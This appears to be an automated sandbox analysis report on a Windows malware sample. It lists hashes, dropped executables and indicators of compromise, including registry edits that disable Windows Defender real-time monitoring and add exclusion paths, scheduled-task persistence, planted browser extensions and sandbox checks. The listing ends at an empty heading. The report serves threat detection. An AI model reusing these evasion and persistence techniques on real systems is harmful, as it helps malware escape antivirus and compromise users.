Analysis
-
max time kernel
132s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27-09-2022 14:02
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
3242ae2edccc379bf6f29af7969e3bbc
-
SHA1
a6a30fabb8a26ac544bfbb699c0553eff37116de
-
SHA256
1a3215e55898b9d944a1d74d2c77d72edbb6385613a51e9b22568fc942e83e28
-
SHA512
5876e2db0a58e416d72be43bea21aca6900d0eb5779b5cfffa58e53bc784664c8b454547dc451bbb51abd4e6b43ace3ee52367837d0179e940d3e002f8391fed
-
SSDEEP
196608:91OHzWMQ1MJoW7dz1VrfHEve6knxIwynv97oh7QGs:3OHzTZPNDkvFEEoh7Qt
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\acZjXHcfgPYOcXywQzR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jPDVFKipU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yNjTJhHiELlhC = "0" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MCYGDcGEHxUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jPDVFKipU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NTslqXAyKxgJdOVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fCscXRmSsoZU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NTslqXAyKxgJdOVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xKkxXQQPSIyydVpo = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xKkxXQQPSIyydVpo = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xKkxXQQPSIyydVpo = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xKkxXQQPSIyydVpo = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yNjTJhHiELlhC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MCYGDcGEHxUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\acZjXHcfgPYOcXywQzR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fCscXRmSsoZU2 = "0" reg.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 29 584 rundll32.exe 30 584 rundll32.exe 31 584 rundll32.exe 32 584 rundll32.exe 33 584 rundll32.exe 35 584 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 2016 Install.exe 1756 Install.exe 1040 HGgTtDq.exe 956 kPdeNMl.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\International\Geo\Nation kPdeNMl.exe -
Loads dropped DLL 12 IoCs
pid Process 1896 file.exe 2016 Install.exe 2016 Install.exe 2016 Install.exe 2016 Install.exe 1756 Install.exe 1756 Install.exe 1756 Install.exe 584 rundll32.exe 584 rundll32.exe 584 rundll32.exe 584 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json kPdeNMl.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json kPdeNMl.exe -
Drops file in System32 directory 23 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol HGgTtDq.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol HGgTtDq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 kPdeNMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA kPdeNMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 kPdeNMl.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol kPdeNMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 kPdeNMl.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 kPdeNMl.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat kPdeNMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA kPdeNMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 kPdeNMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 kPdeNMl.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA kPdeNMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA kPdeNMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 kPdeNMl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 kPdeNMl.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini HGgTtDq.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\jPDVFKipU\KEEtGf.dll kPdeNMl.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja kPdeNMl.exe File created C:\Program Files (x86)\yNjTJhHiELlhC\TBxtUHC.xml kPdeNMl.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi kPdeNMl.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi kPdeNMl.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak kPdeNMl.exe File created C:\Program Files (x86)\jPDVFKipU\MLGLlYq.xml kPdeNMl.exe File created C:\Program Files (x86)\fCscXRmSsoZU2\GKMEYEetGGRfi.dll kPdeNMl.exe File created C:\Program Files (x86)\fCscXRmSsoZU2\qJbRMas.xml kPdeNMl.exe File created C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\BdwzAef.dll kPdeNMl.exe File created C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\nwKLwAG.xml kPdeNMl.exe File created C:\Program Files (x86)\yNjTJhHiELlhC\YjxArXZ.dll kPdeNMl.exe File created C:\Program Files (x86)\MCYGDcGEHxUn\WKrdZnV.dll kPdeNMl.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bJrbMHMDNUyqMIPThG.job schtasks.exe File created C:\Windows\Tasks\FFlCdDCQpdthnDzXV.job schtasks.exe File created C:\Windows\Tasks\SXVvvXCuCecgohx.job schtasks.exe File created C:\Windows\Tasks\ZGhVhnWHpCkuylUXB.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1996 schtasks.exe 1900 schtasks.exe 1768 schtasks.exe 1020 schtasks.exe 1488 schtasks.exe 1624 schtasks.exe 1352 schtasks.exe 1892 schtasks.exe 1664 schtasks.exe 1540 schtasks.exe 1556 schtasks.exe 1020 schtasks.exe 1676 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad kPdeNMl.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs kPdeNMl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{927785FF-6FDD-4EA2-A504-67A742DAD509}\ce-d9-9d-36-8c-9f rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings kPdeNMl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs kPdeNMl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA kPdeNMl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings kPdeNMl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{927785FF-6FDD-4EA2-A504-67A742DAD509}\WpadDecisionTime = 908e1ec78ad2d801 kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs kPdeNMl.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ce-d9-9d-36-8c-9f\WpadDecision = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{927785FF-6FDD-4EA2-A504-67A742DAD509}\WpadDecision = "0" kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs kPdeNMl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{927785FF-6FDD-4EA2-A504-67A742DAD509}\ce-d9-9d-36-8c-9f kPdeNMl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ce-d9-9d-36-8c-9f\WpadDecisionTime = 908e1ec78ad2d801 kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates kPdeNMl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 kPdeNMl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs kPdeNMl.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{927785FF-6FDD-4EA2-A504-67A742DAD509}\WpadDecisionReason = "1" kPdeNMl.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 kPdeNMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 kPdeNMl.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde kPdeNMl.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1640 powershell.EXE 1640 powershell.EXE 1640 powershell.EXE 1908 powershell.EXE 1908 powershell.EXE 1908 powershell.EXE 112 powershell.EXE 112 powershell.EXE 112 powershell.EXE 1348 powershell.EXE 1348 powershell.EXE 1348 powershell.EXE 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe 956 kPdeNMl.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1640 powershell.EXE Token: SeDebugPrivilege 1908 powershell.EXE Token: SeDebugPrivilege 112 powershell.EXE Token: SeDebugPrivilege 1348 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
